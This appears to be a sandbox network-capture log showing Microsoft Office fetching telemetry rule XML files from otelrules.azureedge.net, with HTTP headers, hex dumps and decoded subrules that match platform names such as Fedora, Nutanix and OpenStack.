<?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
134	192.168.2.4	51297	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:11 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:11 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 7c52a88a-f01e-00aa-0993-2a8521000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182011Z-17c5cb586f6p5pndayxh2uxv5400000001d000000000qfb2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:11 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
135	192.168.2.4	51300	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:11 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:11 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:11 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 6cea588d-401e-0015-2b7f-2a0e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182011Z-17c5cb586f6fqqst87nqkbsx1c00000008dg000000009udv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:11 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
136	192.168.2.4	51301	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:12 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:12 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:12 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 5926a802-601e-0032-207f-2aeebb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182012Z-16849878b78km6fmmkbenhx76n000000095g00000000r78f x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:12 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.4	51303	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:12 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:12 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:12 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: c1b2f9d4-701e-0098-1062-26395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182012Z-16849878b782d4lwcu6h6gmxnw00000009mg000000009c6x x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:12 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
138	192.168.2.4	51302	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:12 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:12 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 9f4f074d-601e-00ab-77c7-2a66f4000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182012Z-17c5cb586f62vrfquq10qybcuw00000002sg00000000qgdn x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:12 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
139	192.168.2.4	51304	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:12 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:12 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: bce25016-801e-0035-64b4-2a752a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182012Z-159b85dff8f6x4jjhC1DFW7uqg00000001ng00000000637q x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:12 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.4	51305	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:12 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:12 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:12 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182012Z-16849878b78smng4k6nq15r6s40000000be000000000aygt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:12 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
141	192.168.2.4	51306	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:13 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:13 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: e5751b3d-f01e-0099-0a8e-299171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182013Z-17c5cb586f659tsm88uwcmn6s400000002d0000000008hu9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:13 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
142	192.168.2.4	51307	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:13 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:13 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: 12c3b8a8-601e-0084-2933-2a6b3f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182013Z-159b85dff8flqhxthC1DFWsvrs00000001ug00000000cuht x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:13 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.4	51308	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:13 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:13 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: b7b81bb6-b01e-0084-3bc8-26d736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182013Z-17c5cb586f672xmrz843mf85fn00000008w0000000009sp9 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:13 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.4	51310	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:13 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:13 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:13 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 9016a745-201e-0096-70e6-25ace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182013Z-16849878b782d4lwcu6h6gmxnw00000009h000000000ndp5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-10-31 18:20:13 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.4	51309	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-10-31 18:20:13 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-10-31 18:20:13 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 18:20:13 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: 080d32a9-801e-0035-752d-2b752a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241031T182013Z-15b8d89586f4zwgbgswvrvz4vs0000000be0000000003cz4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
